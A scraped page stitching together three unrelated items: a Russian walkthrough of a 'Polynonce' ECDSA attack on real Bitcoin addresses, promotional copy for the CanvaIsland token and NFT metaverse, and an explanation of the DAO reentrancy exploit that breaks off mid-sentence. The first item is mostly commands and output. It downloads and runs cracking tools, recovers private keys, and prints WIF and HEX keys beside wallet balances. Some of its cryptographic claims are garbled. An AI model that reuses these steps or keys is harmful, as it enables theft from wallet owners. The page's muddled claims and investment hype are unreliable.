  8. CRYPTO DEEP TECH В этой статье мы опять затронем тему: “Критической уязвимости Биткоина” и на всех трех примерах применим совершенно новую атаку 2023 года “POLYNONCE ATTACK”. Самые первые упоминание об этой атаке описано в статье от “Kudelski Security”. https://research.kudelskisecurity.com/2023/03/06/polynonce-a-tale-of-a-novel-ecdsa-attack-and-bitcoin-tears/ За практическую основу мы будем брать материалы из нашей ранней статьи “Speed up secp256k1 with endomorphism” где значения на кривой secp256k1 от Hal Finney LAMBDA и BETA скрываю всю глубину неизвестности эллиптических кривых Биткоина. https://www.rapidtables.com/convert/number/hex-to-binary.html Также нам прекрасно известно, порядок кривой secp256k1 который состоит из 128 bits Binary number (4 digits): “1111” // Hex number: “F” // n = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141 Speed up secp256k1 with endomorphism За теоретическую основу мы будем брать материалы: “Polynonce Attack on Bitcoin” https://attacksafe.ru/polynonce-attack-on-bitcoin 1DxzwX4qC9PsWDSAzuWbJRzEwdGx3n9CJB 929d565c386a279cf7a0382ba48cab1f72d62e7cfb3ab97b4f211d5673bc4441 RawTX 02000000019e3de154f8b473a796b9e39dd279dff1d907a4d27a1d8b23a055f97b08ad4c6e310000006b483045022100b29bdfc27ddf6bebd0e77c84b31dc1bc64b5b2276c8d4147421e96ef85467e8d02204ddd8ff0ffa19658e3b417be5f64d9c425a4d9fcd76238b8538c1d605b229baf0121027b06fe78e39ced37586c42c9ac38d7b2d88ccdd4cd1bb38816c0933f9b8db695ffffffff0169020000000000001600145fc8e854994406f93ea5c7f3abccc5d319ae2a3100000000 Загрузим HEX-данные через утилиту echo и сохраним в файл: RawTX.txt !echo '02000000019e3de154f8b473a796b9e39dd279dff1d907a4d27a1d8b23a055f97b08ad4c6e310000006b483045022100b29bdfc27ddf6bebd0e77c84b31dc1bc64b5b2276c8d4147421e96ef85467e8d02204ddd8ff0ffa19658e3b417be5f64d9c425a4d9fcd76238b8538c1d605b229baf0121027b06fe78e39ced37586c42c9ac38d7b2d88ccdd4cd1bb38816c0933f9b8db695ffffffff0169020000000000001600145fc8e854994406f93ea5c7f3abccc5d319ae2a3100000000' > RawTX.txt Чтобы реализовать атаку мы воспользуемся программным обеспечение “ATTACKSAFE SOFTWARE” www.attacksafe.ru/software Права доступа: !chmod +x attacksafe ls Применение: !./attacksafe -help -version: software version -list: list of bitcoin attacks -tool: indicate the attack -gpu: enable gpu -time: work timeout -server: server mode -port: server port -open: open file -save: save file -search: vulnerability search -stop: stop at mode -max: maximum quantity in mode -min: minimum quantity per mode -speed: boost speed for mode -range: specific range -crack: crack mode -field: starting field -point: starting point -inject: injection regimen -decode: decoding mode !./attacksafe -version Version 5.3.3. [ATTACKSAFE SOFTWARE, © 2023] Запустим список всех атак: !./attacksafe -list Выберем -tool: polynonce_attack 02000000019e3de154f8b473a796b9e39dd279dff1d907a4d27a1d8b23a055f97b08ad4c6e310000006b483045022100b29bdfc27ddf6bebd0e77c84b31dc1bc64b5b2276c8d4147421e96ef85467e8d02204ddd8ff0ffa19658e3b417be5f64d9c425a4d9fcd76238b8538c1d605b229baf0121027b06fe78e39ced37586c42c9ac38d7b2d88ccdd4cd1bb38816c0933f9b8db695ffffffff0169020000000000001600145fc8e854994406f93ea5c7f3abccc5d319ae2a3100000000 Запустим -tool polynonce_attack используя программное обеспечение “ATTACKSAFE SOFTWARE” !./attacksafe -tool polynonce_attack -open RawTX.txt -save SignatureRSZ.csv Мы запустили данную атаку из -tool polynonce_attack и результат сохранился в файл SignatureRSZ.csv Теперь чтобы посмотреть успешный результат откроем файл SignatureRSZ.csv Для того чтобы рассчитать приватный ключ к Биткоин Кошельку из файла SignatureRSZ.csv мы установим SageMath !wget https://cryptodeeptech.ru/sage-9.3-Ubuntu_20.04-x86_64.tar.bz2 !tar -xf sage-9.3-Ubuntu_20.04-x86_64.tar.bz2 cd SageMath/ ls !python3 relocate-once.py !mv '/content/attacksafe' '/content/SageMath/attacksafe' !mv '/content/SignatureRSZ.csv' '/content/SageMath/SignatureRSZ.csv' ls !wget https://raw.githubusercontent.com/demining/CryptoDeepTools/main/20PolynonceAttack/crack_weak_ECDSA_nonces_with_LLL.py !./sage -sh python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 128 4 > PrivateKey.txt cat PrivateKey.txt Мы получили приватный ключ к Биткоин Кошельку в HEX формате PrivKey = 0xf0a3e31646ce147bbd79bb6e45e6e9c8c4e51c535918c9b4cdca9528eb62172d Проверим POLYNONCE для каждой подписи ECDSA https://github.com/demining/CryptoDeepTools/blob/main/20PolynonceAttack/example1/POLYNONCE.py Результат: POLYNONCE >> 93e43392cb31d5d1f75175ee64ce16b7 efc86216627af576c29c9c52a0fd10fe POLYNONCE >> 93e43392cb31d5d1f75175ee64ce16b7 f88ff4c8a9ea4b61b1e087d0c0988826 POLYNONCE >> 93e43392cb31d5d1f75175ee64ce16b7 6849e83cd03d103bcc37aca8323c8d2f POLYNONCE >> 93e43392cb31d5d1f75175ee64ce16b7 efc86216627af576c29c9c52a0fd10fe Благодаря значение на кривой secp256k1 от Hal Finney LAMBDA и BETA раскрыл нам одинаковые первоначальные биты 128 bits так как первоначальные бит приватного ключа к Биткоин Кошельку начинается с Binary number (4 digits): "1111" // Hex number: "F" // Проверим HEX приватного ключа: !pip3 install bitcoin from bitcoin import * with open("PrivateKey.txt","r") as f: content = f.readlines() content = [x.strip() for x in content] f.close() outfile = open("PrivateKeyAddr.txt","w") for x in content: outfile.write(x+":"+pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed"))+"\n") outfile.close() f0a3e31646ce147bbd79bb6e45e6e9c8c4e51c535918c9b4cdca9528eb62172d:1DxzwX4qC9PsWDSAzuWbJRzEwdGx3n9CJB Откроем bitaddress и проверим: ADDR: 1DxzwX4qC9PsWDSAzuWbJRzEwdGx3n9CJB WIF: L5HV2GiosXifcmijGCpFWdYiMRuXh4x4JVK29urGjfAWyasBYoDX HEX: f0a3e31646ce147bbd79bb6e45e6e9c8c4e51c535918c9b4cdca9528eb62172d https://www.blockchain.com/en/explorer/addresses/btc/1DxzwX4qC9PsWDSAzuWbJRzEwdGx3n9CJB BALANCE: $ 3699.40 Рассмотрим остальные примеры: №2 137a6fqt13bhtAkGZWrgcGM98NLCotszR2 c1da9d117e15883ba41539f558ac870f53865ea00f68a8ff8bc7e8a9ee67099b RawTX 010000000103ebc5c4b817124d45ad15e398ec32e9b9b7549c1fc10300ecbf36648c3cb5d42c0000006a47304402204e97dae0ab6e4eee9529f68687907c05db9037d9fbdba78dd01a3338a48d95b602207794cb7aa308243dfbdd5c20225777cd6e01bd7c4f76bf36948aa29290129c2b0121036360352efcff6a823eabb25578a29392eab4d302955fd54ece900578d2ab83b8ffffffff0162020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000 !rm RawTX.txt !rm NoncesHEX.txt !rm PrivateKey.txt !rm SignatureRSZ.csv !rm PrivateKeyAddr.txt !echo '010000000103ebc5c4b817124d45ad15e398ec32e9b9b7549c1fc10300ecbf36648c3cb5d42c0000006a47304402204e97dae0ab6e4eee9529f68687907c05db9037d9fbdba78dd01a3338a48d95b602207794cb7aa308243dfbdd5c20225777cd6e01bd7c4f76bf36948aa29290129c2b0121036360352efcff6a823eabb25578a29392eab4d302955fd54ece900578d2ab83b8ffffffff0162020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000' > RawTX.txt Запустим -tool polynonce_attack используя программное обеспечение “ATTACKSAFE SOFTWARE” !./attacksafe -tool polynonce_attack -open RawTX.txt -save SignatureRSZ.csv Мы запустили данную атаку из -tool polynonce_attack и результат сохранился в файл SignatureRSZ.csv Теперь чтобы посмотреть успешный результат откроем файл SignatureRSZ.csv !./sage -sh python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 128 4 > PrivateKey.txt cat PrivateKey.txt Мы получили приватный ключ к Биткоин Кошельку в HEX формате PrivKey = 0xff0178fa717374f7e74d43f00150748967ea04b64241ec10a10f62debb70868c Проверим POLYNONCE для каждой подписи ECDSA https://github.com/demining/CryptoDeepTools/blob/main/20PolynonceAttack/example2/POLYNONCE.py Результат: POLYNONCE >> 5220dae0c281e1115b4dd69ea3500f70 c5f6da6334586ed2bdc88a05f37bcf95 POLYNONCE >> 5220dae0c281e1115b4dd69ea3500f70 6f82fbd847c138ab48e778135e908149 POLYNONCE >> 5220dae0c281e1115b4dd69ea3500f70 5541022f8aeac81e5ce62e018d1cd722 POLYNONCE >> 5220dae0c281e1115b4dd69ea3500f70 80e88efaff419ecd84d7ded17dc548a7 Благодаря значение на кривой secp256k1 от Hal Finney LAMBDA и BETA раскрыл нам одинаковые первоначальные биты 128 bits так как первоначальные бит приватного ключа к Биткоин Кошельку начинается с Binary number (4 digits): "1111" // Hex number: "F" // Проверим HEX приватного ключа: from bitcoin import * with open("PrivateKey.txt","r") as f: content = f.readlines() content = [x.strip() for x in content] f.close() outfile = open("PrivateKeyAddr.txt","w") for x in content: outfile.write(x+":"+pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed"))+"\n") outfile.close() Откроем bitaddress и проверим: ADDR: 137a6fqt13bhtAkGZWrgcGM98NLCotszR2 WIF: L5mQfFuzR3rzLtneJ7Tcv64JrHjCpK64UN4JRdGDxCUTbQ8NfHxo HEX: ff0178fa717374f7e74d43f00150748967ea04b64241ec10a10f62debb70868c https://www.blockchain.com/en/explorer/addresses/btc/137a6fqt13bhtAkGZWrgcGM98NLCotszR2 BALANCE: $ 1133.73 Рассмотрим остальные примеры: №3 1HxrEeC2X8UEcSvsemPJtTqrnbAetGWYUt fa80af660fc444d87853137506df02e5c75e8c2bf75dc44589b60356867a6d98 RawTX 01000000016eb80d35b08164302e49f88d8f86bf2827a91a5650149be38f4f73751ff41437060000006a473044022043d4c025a0f3be366a0d768c721b9b9191e0c3db6f2c6bfe34e8fb24af7f379102205a4fe2cc6944e00309c35619ff1242301b84d4728b863f97326f56dbd7a782220121027ccccf5f56ed78c2a761721ff3da0f76b792fbe4eae2ac73e7b4651bc3ef19cdffffffff01c057010000000000232103bec42e5d718b0e5b3853243c9bcf00dd671a335b0eb99fd8ca32f8d5784a9476ac00000000 !rm RawTX.txt !rm NoncesHEX.txt !rm PrivateKey.txt !rm SignatureRSZ.csv !rm PrivateKeyAddr.txt !echo '01000000016eb80d35b08164302e49f88d8f86bf2827a91a5650149be38f4f73751ff41437060000006a473044022043d4c025a0f3be366a0d768c721b9b9191e0c3db6f2c6bfe34e8fb24af7f379102205a4fe2cc6944e00309c35619ff1242301b84d4728b863f97326f56dbd7a782220121027ccccf5f56ed78c2a761721ff3da0f76b792fbe4eae2ac73e7b4651bc3ef19cdffffffff01c057010000000000232103bec42e5d718b0e5b3853243c9bcf00dd671a335b0eb99fd8ca32f8d5784a9476ac00000000' > RawTX.txt Запустим -tool polynonce_attack используя программное обеспечение “ATTACKSAFE SOFTWARE” !./attacksafe -tool polynonce_attack -open RawTX.txt -save SignatureRSZ.csv Мы запустили данную атаку из -tool polynonce_attack и результат сохранился в файл SignatureRSZ.csv Теперь чтобы посмотреть успешный результат откроем файл SignatureRSZ.csv !./sage -sh python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 128 4 > PrivateKey.txt cat PrivateKey.txt Мы получили приватный ключ к Биткоин Кошельку в HEX формате PrivKey = 0xfbc50a7158b3d9fd7fd58fe0874f20c10c650975dc118163debf442a44203fdf Проверим POLYNONCE для каждой подписи ECDSA https://github.com/demining/CryptoDeepTools/blob/main/20PolynonceAttack/example3/POLYNONCE.py Результат: POLYNONCE >> d7460c5b1a98f6d0443ae1cfe1f17814 fbc50a7158b3d9fd7fd58fe0874f20c1 POLYNONCE >> d7460c5b1a98f6d0443ae1cfe1f17814 d4de8d539655ecf0d50fd32187c3c467 POLYNONCE >> d7460c5b1a98f6d0443ae1cfe1f17814 6726aea1a6fd64d82dc657670352de72 POLYNONCE >> d7460c5b1a98f6d0443ae1cfe1f17814 89df16fd387156b39adca9a92464de18 Благодаря значение на кривой secp256k1 от Hal Finney LAMBDA и BETA раскрыл нам одинаковые первоначальные биты 128 bits так как первоначальные бит приватного ключа к Биткоин Кошельку начинается с Binary number (4 digits): "1111" // Hex number: "F" // Проверим HEX приватного ключа: from bitcoin import * with open("PrivateKey.txt","r") as f: content = f.readlines() content = [x.strip() for x in content] f.close() outfile = open("PrivateKeyAddr.txt","w") for x in content: outfile.write(x+":"+pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed"))+"\n") outfile.close() Откроем bitaddress и проверим: ADDR: 1HxrEeC2X8UEcSvsemPJtTqrnbAetGWYUt WIF: L5f7p5bReuXLm3d7rFkpPyGQ1GNpiGuj8QuQ6rNCKXC9bs3J9GEY HEX: fbc50a7158b3d9fd7fd58fe0874f20c10c650975dc118163debf442a44203fdf https://www.blockchain.com/en/explorer/addresses/btc/1HxrEeC2X8UEcSvsemPJtTqrnbAetGWYUt BALANCE: $ 459.24 Literature: A Novel Related Nonce Attack for ECDSA, Marco Macchetti [Kudelski Security, Switzerland] (2023) Gallant, Robert P., Robert J. Lambert, and Scott A. Wanston. “Faster point multiplication on elliptic curves with efficient endomorphisms” . Annual International Conference on Cryptology, pp. 190–200. Springer, Berlin, Heidelberg, (2001) Hankerson, Darrell, Alfred J. Menezes, and Scott Wanston. “A Guide to Elliptic Curve Cryptography” . Computer Reviews 46, no. 1 (2005) Hal Finney. bitcointalk – “Acceleration of signature verification” . (2011) https://bitcointalk.org/index.php?topic=3238.0 Blahut, Richard E. “Cryptography and Secure Communication” . Cambridge University Press, (2014) Исходный код ATTACKSAFE SOFTWARE Telegram: https://t.me/cryptodeeptech Видеоматериал: https://youtu.be/7nKs_KHtyn4 Источник: https://cryptodeep.ru/polynonce-attack Криптоанализ
  9. CanvaIsland (CANVA) : GameFi ecosystem with Metaverse Built on Ethereum CanvaIsland is a progressive decentralized ecosystem consist of Metaverse with open world, DeFi platform,wallet and other products powered by the Ethereum blockchain. Within the Canva Island metaverse, users can create your own town, explore world, monetize their content and earn tokens. Just imagine an open world where you can identify yourself as anyone you want. You can spend time in the virtual world doing what you like and get tokens for it, appreciation from other users, and more, thanks to blockchain technology. • Join huge communities by interest or to reach common goals in our metacommunity. Have fun at the different thematic events you couldn't attend before. • Reach new heights in completely new professions. • Create the craft that allows you to earn every second CanvaIsland have been developing ecosystem since 2021, currently it includes Metaverse with NFT lands, Avatars, DeFi platform, Canva Wallet, all built around the $CANVA token. Stake, make money in the metaverse, invite your friends, participate special events and much much more awaits you at Canva Island ?Join to Canvaisland AIRDROP NFT Avatars 10,000 unique avatars from our team that will highlited you and give you many advantages. In addition, there will be integration of other PFP projects and directions into our CanvaIsland metaverse. The possibility of earning with your avatars. Earning $CANVA tokens for NFT avatars holders Participation in unique quests for Avatar owners. Participation in special giveaways Participation in NFT staking and other pools. Separated chat for avatar owners Participation in early community exhibitions, which will result in cash grants and partnerships. Unique project avatars (limited) Ability to sell NFT avatar on our marketplace, Open Sea & other CanvaIsland Islands and NFT-lands Become the owner of unique NFT-land in the CanvaIsland metaverse, build your city and monetize your content. By purchasing plots on a different islands, users will get access to the functionality of this island: Building objects, ability to sell their NFTs. Many ways to earn $CANVA tokens. Access to closed community among land owners and much more! Our first island consists of 256 lands that have been successfully sold and are currently being traded on OpenSea. A new island with 1024 lands will be added soon Genesis Island (sold out,available on OpenSea) The first island is 256 unique pieces of land in the form of NFTs on the Ethereum network, divided into 5 levels. This island makes an investment sense for the establishment of the base and development of the project. After acquiring the land, the owners will gradually receive different benefits (PFP, tokens, NFT avatars of characters, access to a private chat to manage the development of the island and more) Lake Island (soon) There are second Island in CanvaIsland Metaverse with 1024 unique NFT-land sectors on the Ethereum network. These sectors make investment sense for creating a base and developing our metaverse. After the land acquisition, the owners will gradually receive various benefits. The function of minting land sectors and the launch of the island will be in the near future. Follow the announcements on our social networks. Benefits for NFT-land owners: Possibility of construction of different buildings, objects Participation in unique quests for land owners Access to NFT staking and other pools (Soon) Passive income from land ownership (Soon) Creation and implementation of quests on the own territories Extraction of various resources (Soon) Access to land owners chat (Soon) Ability to sell NFT-land through our NFT marketplace, Open Sea or any other platforms Holding quests in own territories Creating own business by your own rules Investment model for NFT land owners. We encourage users to grow the Canva Island metaverse and so all land owners can use NFT-staking to earn $CANVA tokens. Land sectors are divided into levels and have different investment meanings. About $CANVA token (Fair Launch soon) $CANVA is an ERC-20 token built on the Ethereum blockchain. It is the main utility token in our progressive ecosystem. $CANVA token is used in our metaverse, mobile wallet, as well as for buying NFT, staking and more. $CANVA has a stable economic model and deflationary mechanism. LP lock for 365 days. 900 million tokens minting by blocks Canva is not traded yet. Fair Launch soon. Check Announcements in official channel CANVA tokenomics Burning mechanism: Initial NFT avatars sales 50% of the funds from the initial sale of NFT Avatars will be used to buy back and burn Initial NFT lands sales 50% of the funds from the initial sale of NFT Lands will be used to buy back and burn. Harvest fee 50% of the harvest fee will be sent to the burn address Canva wallet fees 100% of collected comissions from Canva Wallet will be sent to the burn address Early unstaking fee 50% of the collected early-unstaking commissions will be sent to the burn address CANVA Utility: CANVA token holders can generate passive income by staking their tokens in the staking pools and receive rewards in return - See Staking pools. CANVA token can be used in Canva Island metaverse ecosystem CANVA token is used to buy game objects CANVA token can be used for NFT minting with discounts CANVA token holders can participate in the platform’s governance by proposing and voting for changes.(DAO) CANVA token allows you to save on Canva Wallet fees CANVA token allows you to participate in our Launchpad projects (soon) CANVA token is used to improve in-game items (soon) And much more to come Canva staking pools Canva Island Pools is a less resource-intensive alternative to mining. It lets you use your tokens to earn more tokens, for free and without limits. Simply put in pool your cryptocurrency to receive rewards. From the very beginning, a user could stake only $CANVA tokens in exchange for more $Canva. Later, there are more opportunities, our users can stake other tokens in exchange for $CANVA Referral program Canva Island Referral Program allows you to invite friends and earn 10% commission from their friends earnings on Staking Pools Canva wallet Canva crypto-wallet is designed with the latest technology to ensure that your assets are secure and always accessible. Buy, sell, send, receive, and trade the most widely used ERC-20 tokens. Connect instantly to DApps. Earn interest, trade using decentralized exchanges, participate in NFT marketplaces and more. Canvaisland Community Telegram Announcements Channel Twitter ️ Discord
  10. CRYPTO DEEP TECH In this article, we will look at a bug in the DAO code. The hacker exploited a bug in the code of the DAO and stole more or less $50 million worth of ether. I will focus here only on the main technical issue of the exploit: The fallback function. For a more detailed and advanced recount of the attack, the blog posts by Phil Daian and Peter Vessenes are highly recommended. This post will be the first in what is potentially a series, deconstructing and explaining what went wrong at the technical level while providing a timeline tracing the actions of the attacker back through the blockchain. This first post will focus on how exactly the attacker stole all the money in the DAO. A Multi-Stage Attack This exploit in the DAO is clearly not trivial; the exact programming pattern that made the DAO vulnerable was not only known, but fixed by the DAO creators themselves in an earlier intended update to the framework’s code. Ironically, as they were writing their blog posts and claiming victory, the hacker was preparing and deploying an exploit that targeted the same function they had just fixed to drain the DAO of all its funds. Let’s get into the overview of the attack. The attacker was analyzing DAO.sol, and noticed that the ‘splitDAO’ function was vulnerable to the recursive send pattern we’ve described above: this function updates user balances and totals at the end, so if we can get any of the function calls before this happens to call splitDAO again, we get the infinite recursion that can be used to move as many funds as we want (code comments are marked with XXXXX, you may have to scroll to see em): function splitDAO( uint _proposalID, address _newCurator ) noEther onlyTokenholders returns (bool _success) { ... // XXXXX Move ether and assign new Tokens. Notice how this is done first! uint fundsToBeMoved = (balances[msg.sender] * p.splitData[0].splitBalance) / p.splitData[0].totalSupply; if (p.splitData[0].newDAO.createTokenProxy.value(fundsToBeMoved)(msg.sender) == false) // XXXXX This is the line the attacker wants to run more than once throw; ... // Burn DAO Tokens Transfer(msg.sender, 0, balances[msg.sender]); withdrawRewardFor(msg.sender); // be nice, and get his rewards // XXXXX Notice the preceding line is critically before the next few totalSupply -= balances[msg.sender]; // XXXXX AND THIS IS DONE LAST balances[msg.sender] = 0; // XXXXX AND THIS IS DONE LAST TOO paidOut[msg.sender] = 0; return true; } The basic idea is this: propose a split. Execute the split. When the DAO goes to withdraw your reward, call the function to execute a split before that withdrawal finishes. The function will start running without updating your balance, and the line we marked above as “the attacker wants to run more than once” will run more than once. What does that do? Well, the source code is in TokenCreation.sol, and it transfers tokens from the parent DAO to the child DAO. Basically the attacker is using this to transfer more tokens than they should be able to into their child DAO. How does the DAO decide how many tokens to move? Using the balances array of course: uint fundsToBeMoved = (balances[msg.sender] * p.splitData[0].splitBalance) / p.splitData[0].totalSupply; Because p.splitData[0] is going to be the same every time the attacker calls this function (it’s a property of the proposal p, not the general state of the DAO), and because the attacker can call this function from withdrawRewardFor before the balances array is updated, the attacker can get this code to run arbitrarily many times using the described attack, with fundsToBeMoved coming out to the same value each time. The first thing the attacker needed to do to pave the way for his successful exploit was to have the withdraw function for the DAO, which was vulnerable to the critical recursive send exploit, actually run. Let’s look at what’s required to make that happen in code (from DAO.sol): function withdrawRewardFor(address _account) noEther internal returns (bool _success) { if ((balanceOf(_account) * rewardAccount.accumulatedInput()) / totalSupply < paidOut[_account]) throw; uint reward = (balanceOf(_account) * rewardAccount.accumulatedInput()) / totalSupply - paidOut[_account]; if (!rewardAccount.payOut(_account, reward)) // XXXXX vulnerable throw; paidOut[_account] += reward; return true; } If the hacker could get the first if statement to evaluate to false, the statement marked vulnerable would run. When that statements runs, code that looks like this would be called: function payOut(address _recipient, uint _amount) returns (bool) { if (msg.sender != owner || msg.value > 0 || (payOwnerOnly && _recipient != owner)) throw; if (_recipient.call.value(_amount)()) { // XXXXX vulnerable PayOut(_recipient, _amount); return true; } else { return false; } Notice how the marked line is exactly the vulnerable code mentioned in the description of the exploit we linked! That line would then send a message from the DAO’s contract to “_recipient” (the attacker). “_recipient” would of course contain a default function, that would call splitDAO again with the same parameters as the initial call from the attacker. Remember that because this is all happening from inside withdrawFor from inside splitDAO, the code updating the balances in splitDAO hasn’t run. So the split will send more tokens to the child DAO, and then ask for the reward to be withdrawn again. Which will try to send tokens to “_recipient” again, which would again call split DAO before updating the balances array. And so it goes: Propose a split and wait until the voting period expires. (DAO.sol, createProposal) Execute the split. (DAO.sol, splitDAO) Let the DAO send your new DAO its share of tokens. (splitDAO -> TokenCreation.sol, createTokenProxy) Make sure the DAO tries to send you a reward before it updates your balance but after doing (3). (splitDAO -> withdrawRewardFor -> ManagedAccount.sol, payOut) While the DAO is doing (4), have it run splitDAO again with the same parameters as in (2) (payOut -> _recipient.call.value -> _recipient()) The DAO will now send you more child tokens, and go to withdraw your reward before updating your balance. (DAO.sol, splitDAO) Back to (5)! Let the DAO update your balance. Because (7) goes back to (5), it never actually will :-). (Side note: Ethereum’s gas mechanics don’t save us here. call.value passes on all the gas a transaction is working with by default, unlike the send function. so the code will run as long as the attacker will pay for it, which considering it’s a cheap exploit means indefinitely) Armed with this, we can provide a step by step re-trace of how The DAO got emptied out. Step 1: Proposing the Split The first step towards all of the above is to simply propose a regular split, as we’ve mentioned. The attacker does this in the blockchain here in DAO Proposal #59, with the title “Lonely, so Lonely”. Because of this line: // The minimum debate period that a split proposal can have uint constant minSplitDebatePeriod = 1 weeks; he had to wait a week for the proposal to see approval. No matter, it’s just a split proposal like any other! Nobody will look too closely at it, right? Step 2: Getting the Reward As was neatly explained in one of slock.it’s previous posts on the matter, there are no rewards for the DAO to give out yet! (because no rewards were generated). As we mentioned in the overview, the critical lines that need to run here are: function withdrawRewardFor(address _account) noEther internal returns (bool _success) { if ((balanceOf(_account) * rewardAccount.accumulatedInput()) / totalSupply < paidOut[_account]) // XXXXX throw; uint reward = (balanceOf(_account) * rewardAccount.accumulatedInput()) / totalSupply - paidOut[_account]; if (!rewardAccount.payOut(_account, reward)) // XXXXX throw; paidOut[_account] += reward; return true; } If the hacker could get the first marked line to run, the second marked line will run the default function of his choosing (that calls back to splitDAO as we described previously). Let’s deconstruct the first if statement: if ((balanceOf(_account) * rewardAccount.accumulatedInput()) / totalSupply < paidOut[_account]) The balanceOf function is defined in Token.sol, and of course does exactly this: return balances[_owner]; The rewardAccount.accumulatedInput() line is evaluated from code in ManagedAccount.sol: // The sum of ether (in wei) which has been sent to this contract uint public accumulatedInput; Luckily accumulatedInput is oh so simple to manipulate. Just use the default function of the reward account! function() { accumulatedInput += msg.value; } Not only that, but because there is no logic to decrease accumulatedInput anywhere (it tracks the input the account has gotten from all the transactions ever), all the attacker needs to do is send a few Wei to the reward account and our original condition will not only evaluate to false, but its constituent values will evaluate to the same thing every time it’s called: if ((balanceOf(_account) * rewardAccount.accumulatedInput()) / totalSupply < paidOut[_account]) Remember that because balanceOf refers to balances, which never gets updated, and because paidOut and totalSupply also never get updated since that code in splitDAO never actually executes, the attacker gets to claim their tiny share of the reward with no problems. And because they can claim their share of the reward, they can run their default function and reenter back to splitDAO. Whoopsie. But do they actually need to include a reward? Let’s look at the line again: if ((balanceOf(_account) * rewardAccount.accumulatedInput()) / totalSupply < paidOut[_account]) What if the reward account balance is 0? Then we get if (0 < paidOut[_account]) If nothing has ever been paid out, this will always evaluate to false and never throw! Why? The original line is equivalent, after subtracting paidOut from both sides, to: if ((balanceOf(_account) * rewardAccount.accumulatedInput()) / totalSupply - paidOut[_account] < 0) where that first part is actually how much is being paid out. So the check is actually: if (amountToBePaid < 0) But if amountToBePaid is 0, the DAO pays you anyway. To me this doesn’t make much sense — why waste the gas in this manner? I think this is why many people assumed the attacker needed a balance in the reward account to proceed with the attack, something they in fact did not require. The attack works the same way with an empty reward account as with a full one! Let’s take a look at the DAO’s reward address. The DAO accounting documentation from Slockit pegs this address as 0xd2e16a20dd7b1ae54fb0312209784478d069c7b0. Check that account’s transactions and you see a pattern: 200 pages of .00000002 ETH transactions to 0xf835a0247b0063c04ef22006ebe57c5f11977cc4 and 0xc0ee9db1a9e07ca63e4ff0d5fb6f86bf68d47b89, the attacker’s two malicious contracts (which we cover later). That’s one transaction for each recursive call of withdrawRewardFor, which we described above. So in this case there actually was a balance in the rewards account, and the attacker gets to collect some dust. Step 3: The Big Short A number of entirely unsubstantiated allegations on social media have pointed to a $3M Ethereum short that occurred on Bitfinex just moments before the attack, claiming this short closed with almost $1M USD of profit. It’s obvious to anyone constructing or analyzing this attack that certain properties of the DAO (specifically that any split must be running the same code as the original DAO) require an attacker to wait through the creation period of their child DAO (27 days) before withdrawing any coins in a malicious split. This gives the community time to respond to a theft, through either a soft fork freezing attacker funds or a hard fork rolling back the compromise entirely. Any financially motivated attacker who had attempted their exploit on the testnet would have an incentive to ensure profits regardless of a potential rollback or fork by shorting the underlying token. The staggering drop that resulted within minutes of the smart contract that triggered the malicious split provided an excellent profit opportunity, and while there is no proof the attacker took the profit opportunity, we can at least conclude that after all this effort they would have been stupid not to. Step 3a: Preventing Exit (Resistance is Futile) Another contingency that the attacker needed to think of is the case that a DAO split occurs before the attacker can finish emptying the DAO. In this case, with another user as sole curator, the attacker would have no access to DAO funds. Unfortunately the attacker is a smart guy: there is evidence that the attacker has voted yes on all split proposals that come to term after his own, making sure that he would hold some tokens in the case of any DAO split. Because of a property of the DAO we’ll discuss later in the post, these split DAOs are vulnerable to the same emptying attack we’re describing here. All the attacker has to do is sit through the creation period, send some Ether to the reward account, and propose and execute a split by himself away from this new DAO. If he can execute before the curator of this new DAO updates the code to remove the vulnerability, he manages to squash all attempts to get Ether out of the DAO that aren’t his own. Notice by the timestamps here that the attacker did this right around the time he started the malicious split, almost as an afterthought. I see this more as an unnecessary middle finger to the DAO than a financially viable attack: having already emptied virtually the entire DAO, going through this effort to pick up any pennies that might be left on the table is probably an attempt to demoralize holders into inaction. Many have concluded, and I agree, that this hints at the attacker’s motivations being a complete destruction of the DAO that goes beyond profit taking. While none of us know the truth here, I do recommend applying your own judgment. Interestingly enough, this attack was described by Emin Gün Sirer after it had already occurred on the blockchain, but before the public had noticed. Step 4: Executing the Split So we’ve painstakingly described all the boring technical aspects of this attack. Let’s get to the fun part, the action: executing the malicious split. The account that executed the transactions behind the split is 0xf35e2cc8e6523d683ed44870f5b7cc785051a77d. The child DAO they sent funds to is 0x304a554a310c7e546dfe434669c62820b7d83490. The proposal was created and initiated by account 0xb656b2a9c3b2416437a811e07466ca712f5a5b5a (you can see the call to createProposal in the blockchain history there). Deconstructing the constructor arguments that created that child DAO leads us to a curator at 0xda4a4626d3e16e094de3225a751aab7128e96526. That smart contract is just a regular multisignature wallet, with most of its past transactions being adding/removing owners and other wallet management tasks. Nothing interesting there. Johannes Pfeffer on Medium has an excellent blockchain-based reconstruction of the transactions involved in the malicious Child DAO. I won’t spend too much time on such blockchain analysis, since he’s already done a great job. I highly encourage anyone interested to start with that article. In the next article in the series, we’ll look at the code from the malicious contract itself (containing the exploit that actually launched the recursive attack). In the interest of expedience of release, we have not yet completed such an analysis. Step 4a: Extending the Split This step is an update to the original update, and covers how the attacker was able to turn a ~30X amplification attack (due to the max size of Ethereum’s stack being capped at 128) to a virtually infinite draining account. Savvy readers of the above may notice that, even after overwhelming the stack and executing many more malicious splits than was required, the hacker would have their balance zeroed out by the code at the end of splitDAO: function splitDAO( .... withdrawRewardFor(msg.sender); // be nice, and get his rewards totalSupply -= balances[msg.sender]; balances[msg.sender] = 0; paidOut[msg.sender] = 0; return true; } So how did the attacker get around this? Thanks to the ability to transfer DAO tokens, he didn’t really need to! All he had to do was call the DAO’s helpful transfer function at the top of his stack, from his malicious function: function transfer(address _to, uint256 _amount) noEther returns (bool success) { if (balances[msg.sender] >= _amount && _amount > 0) { balances[msg.sender] -= _amount; balances[_to] += _amount; ... By transferring the tokens to a proxy account, the original account would be zeroed out correctly at the end of splitDAO (notice how if A transfers all its money to B, A’s account is already zeroed out by transfer before it can be zeroed out by splitDAO). The attacker can then send the money back from the proxy account to the original account and start the whole process again. Even the update to totalSupply in splitDAO is missed, since 